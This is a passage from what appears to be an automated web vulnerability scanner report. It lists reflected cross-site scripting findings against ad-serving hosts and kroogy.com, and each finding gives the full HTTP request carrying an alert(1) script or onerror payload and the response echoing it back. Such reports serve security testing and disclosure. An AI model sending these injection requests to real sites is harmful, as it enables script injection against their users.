GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Fpagead%2Fads%3Fclient%3Dca-pub-6888065668292638%26output%3Dhtml%26h%3D600%26slotname%3D2465090616%26w%3D160%26ea%3D0%26flash%3D10.2.154%26url%3Dhttp%253A%252F%252Fpub.retailer-amazon.net%252Fbanner_120_600_a.php%253Fsearch%253D%257B%2524keyword%257D%26dt%3D1303647951817%26bpp%3D4%26shv%3Dr20110414%26jsv%3Dr20110415%26correlator%3D1303647951838%26frm%3D1%26adk%3D2614322350%26ga_vid%3D2144667481.1303647952%26ga_sid%3D1303647952%26ga_hid%3D2004805199%26ga_fc%3D0%26u_tz%3D-300%26u_his%3D3%26u_java%3D1%26u_h%3D1200%26u_w%3D1920%26u_ah%3D1156%26u_aw%3D1920%26u_cd%3D16%26u_nplug%3D9%26u_nmime%3D44%26biw%3D-12245933%26bih%3D-12245933%26ifk%3D3901296887%26fu%3D4%26ifi%3D1%26dtd%3D26&uid=ZC45X9Axu6NOUFfX_28966898ed0<script>alert(1)</script>82d8bb5aab2&xy=0%2C0&wh=160%2C600&vchannel=69113&cid=166308&iad=1303647980799-33281526900827884&cookieenabled=1&screenwh=1920%2C1200&adwh=160%2C600&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=C8BADFB2649DAACCD3E1635ED3EF64F7; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 145
Date: Sun, 24 Apr 2011 12:30:39 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_28966898ed0<script>alert(1)</script>82d8bb5aab2");

5.9. http://ib.adnxs.com/ab [cnd parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the cnd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1245f'-alert(1)-'7270a6fca4a was submitted in the cnd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=UbgehetRD0BSuB6F61EPQAAAAEAzMwdAUrgehetRD0BSuB6F61EPQJ26QO8tSsIkSsYda6b2ziXkFrRNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAmx_UNQAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303647972%29%3Buf%28%27c%27%2C+47580%2C+1303647972%29%3Buf%28%27r%27%2C+173254%2C+1303647972%29%3Bppv%288991%2C+%272648761091995253405%27%2C+1303647972%2C+1303691172%2C+47580%2C+25553%29%3B&cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..1245f'-alert(1)-'7270a6fca4a&referrer=http://pub.retailer-amazon.net/banner_120_600_a.php&pp=TbQW5AAFuF0K5TsMlgwlG6ulJHSvXriXqLC8qA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYAuQZwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqtzXEDaddpfmi41fzFhJXYz2hn5O0A%26client%3Dca-pub-6888065668292638%26adurl%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303647951817&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303647951838&frm=1&adk=2614322350&ga_vid=2144667481.1303647952&ga_sid=1303647952&ga_hid=2004805199&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=26
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIm4sBEAoYASABKAEwhY7L7QQQhY7L7QQYAA..; sess=1; uuid2=2724386019227846218; anj=Kfu=8fG5+^ErkX00s]#%2L_'x%SEV/i#-Z[4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ_xgcc?/x+()3bsr'Cdow<veb?3Uv/UVYw=)_4D2ZjV3rbT=:l8]3^OkGzcVI6f^gvuV^I7ju^9f:I2>xky:`%sBTDqAUE0e56>F=_I^rRxXtls7eG1CflaNaIM'U.!TFd(icoIMFD8Eq<2pQLEEmmW8KJv/eZMYZ^UC6q``1N6p(m049Jmn`V9t>QhMj!HjDo6uf6G-(O-%mU+-jE%0BM#DUE%oZDSFs[C#jT6#4fpHXSw^4MSkbcW^kJHs5vG[(l?%GK2v+wIbLRbZpJZPWPCtBpj(f-%Uqi+C`pFa#KCPN5<uj90t1PzS3+VX?C

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Mon, 25-Apr-2011 12:31:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 12:31:20 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Sat, 23-Jul-2011 12:31:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%ErkX00s]#%2L_'x%SEV/i#+O:4FSlRQHqgV=Rr7(Xk4Qqsf:-MV!ucpO8MvVo804<ws1H^P9BKUe`h-Uw1UV1'!F+iwGt=a'0z[`+B!OOclfZN%p1anmQi))(EM:>@>kRSP_qN]`FJCe#'.gAbjII9rT^:Vp?%xJEuJ`Be1]=6>9ihz-.bH-TwYBtaP2Z*7o9)NCI!IqN_21C4Nr5>oyW]]FlbwqoN3oN9Q[Ry.HV1loEoVkAa=QO!jG:cNKQi?NwxN+T84X=?B#oJ:g/9Y=s#M^w'=n'm1_EClIL>iuL`>)XwT?jd`+<zV!^5>9OHbQMHOGjU=yDoEKxAEZjL$$E[8VF_T1y`$R^fewUBXEHbOf)CrV(<9*nUGY%7uj)@9HgK.z!%#r!Kjs:Q'YOAI]f*J+>[/Bh/ce?bDXi/Si-1dp=y:2fw>PouZtY[Z5a<'%a=4=2#H)DhRBw#R0T!9v`THC)^>; path=/; expires=Sat, 23-Jul-2011 12:31:20 GMT; domain=.adnxs.com; HttpOnly
Date: Sun, 24 Apr 2011 12:31:20 GMT
Content-Length: 1533

document.write('<scr' + 'ipt language=\"Javascript\"><!--\n amgdgt_p=\"5112\";\n amgdgt_pl=\"bca52e1b\"; \n amgdgt_t = \"i\";\n amgdgt_clkurl = \"http://ib.adnxs.com/click/Z2ZmZmZmCkBmZmZmZmYKQAAA
...[SNIP]...
D8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAEAkBAgUCAAQAAAAAiR7ltAAAAAA./cnd=!uQ_KtAjc8wIQxskKGAAg0ccBKEsxMzMzd-tRD0BCCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..1245f'-alert(1)-'7270a6fca4a/referrer=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php/clickenc=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBKkbp5Ba0Td3wFoz2lAebyrCwCdfq-NMBn6CU7BifxO3UHAAQARgBIAA4A
...[SNIP]...

5.10. http://kroogy.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f4c9e<img%20src%3da%20onerror%3dalert(1)>0d6ca5ff0dc was submitted in the REST URL parameter 1. This input was echoed as f4c9e<img src=a onerror=alert(1)>0d6ca5ff0dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.icof4c9e<img%20src%3da%20onerror%3dalert(1)>0d6ca5ff0dc HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:26:19 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2134

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Favicon.icof4c9e<img src=a onerror=alert(1)>0d6ca5ff0dcController</strong>
...[SNIP]...

5.11. http://kroogy.com/index/livesearch&q=s&type=web [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=s&type=web

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5289d<img%20src%3da%20onerror%3dalert(1)>704a0bea83e was submitted in the REST URL parameter 1. This input was echoed as 5289d<img src=a onerror=alert(1)>704a0bea83e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index5289d<img%20src%3da%20onerror%3dalert(1)>704a0bea83e/livesearch&q=s&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:26:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2128

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Index5289d<img src=a onerror=alert(1)>704a0bea83eController</strong>
...[SNIP]...

5.12. http://kroogy.com/index/livesearch&q=s&type=web [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=s&type=web

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 84a7e<img%20src%3da%20onerror%3dalert(1)>70c18f09796 was submitted in the REST URL parameter 2. This input was echoed as 84a7e<img src=a onerror=alert(1)>70c18f09796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index/livesearch84a7e<img%20src%3da%20onerror%3dalert(1)>70c18f09796&q=s&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:26:54 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2124

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>livesearch84a7e<img src=a onerror=alert(1)>70c18f09796</strong>
...[SNIP]...

5.13. http://kroogy.com/index/livesearch&q=si&type=web [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=si&type=web

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 83857<img%20src%3da%20onerror%3dalert(1)>5428059cf9b was submitted in the REST URL parameter 1. This input was echoed as 83857<img src=a onerror=alert(1)>5428059cf9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index83857<img%20src%3da%20onerror%3dalert(1)>5428059cf9b/livesearch&q=si&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:27:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2128

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Index83857<img src=a onerror=alert(1)>5428059cf9bController</strong>
...[SNIP]...

5.14. http://kroogy.com/index/livesearch&q=si&type=web [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=si&type=web

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c18b9<img%20src%3da%20onerror%3dalert(1)>e9c49ce397c was submitted in the REST URL parameter 2. This input was echoed as c18b9<img src=a onerror=alert(1)>e9c49ce397c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index/livesearchc18b9<img%20src%3da%20onerror%3dalert(1)>e9c49ce397c&q=si&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:01 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2124

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>livesearchc18b9<img src=a onerror=alert(1)>e9c49ce397c</strong>
...[SNIP]...

5.15. http://kroogy.com/index/livesearch&q=sit&type=web [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=sit&type=web

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 44c9f<img%20src%3da%20onerror%3dalert(1)>230c1568b68 was submitted in the REST URL parameter 1. This input was echoed as 44c9f<img src=a onerror=alert(1)>230c1568b68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index44c9f<img%20src%3da%20onerror%3dalert(1)>230c1568b68/livesearch&q=sit&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2128

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Index44c9f<img src=a onerror=alert(1)>230c1568b68Controller</strong>
...[SNIP]...

5.16. http://kroogy.com/index/livesearch&q=sit&type=web [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=sit&type=web

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a288e<img%20src%3da%20onerror%3dalert(1)>085eb934534 was submitted in the REST URL parameter 2. This input was echoed as a288e<img src=a onerror=alert(1)>085eb934534 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index/livesearcha288e<img%20src%3da%20onerror%3dalert(1)>085eb934534&q=sit&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2124

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>livesearcha288e<img src=a onerror=alert(1)>085eb934534</strong>
...[SNIP]...

5.17. http://kroogy.com/index/livesearch&q=site&type=web [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=site&type=web

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e8181<img%20src%3da%20onerror%3dalert(1)>1e804ed95f7 was submitted in the REST URL parameter 1. This input was echoed as e8181<img src=a onerror=alert(1)>1e804ed95f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /indexe8181<img%20src%3da%20onerror%3dalert(1)>1e804ed95f7/livesearch&q=site&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:35 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2128

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>Indexe8181<img src=a onerror=alert(1)>1e804ed95f7Controller</strong>
...[SNIP]...

5.18. http://kroogy.com/index/livesearch&q=site&type=web [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=site&type=web

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2bfbe<img%20src%3da%20onerror%3dalert(1)>6d8fdcd1241 was submitted in the REST URL parameter 2. This input was echoed as 2bfbe<img src=a onerror=alert(1)>6d8fdcd1241 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index/livesearch2bfbe<img%20src%3da%20onerror%3dalert(1)>6d8fdcd1241&q=site&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nscriptinfo=75cb7e9c9ffe8c8a168e0e32a6695d87; __utmz=221607367.1303647943.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=221607367.144172721.1303647943.1303647943.1303647943.1; __utmc=221607367; __utmb=221607367.1.10.1303647943

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 12:28:47 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 2124

<html>
   <head>
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.kroogy.com/search/amazon?search=mp3&type=Amazon&fl=0">
       <style>
       <!--
       .nesoternd { padding: 0px;margin:0 0px; background-color:
...[SNIP]...
<strong>livesearch2bfbe<img src=a onerror=alert(1)>6d8fdcd1241</strong>
...[SNIP]...

5.19. http://kroogy.com/index/livesearch&q=site:&type=web [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kroogy.com
Path:   /index/livesearch&q=site:&type=web

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 11056<img%20src%3da%20onerror%3dalert(1)>15604bb1f75 was submitted in the REST URL parameter 1. This input was echoed as 11056<img src=a onerror=alert(1)>15604bb1f75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /index11056<img%20src%3da%20onerror%3dalert(1)>15604bb1f75/livesearch&q=site:&type=web HTTP/1.1
Host: kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
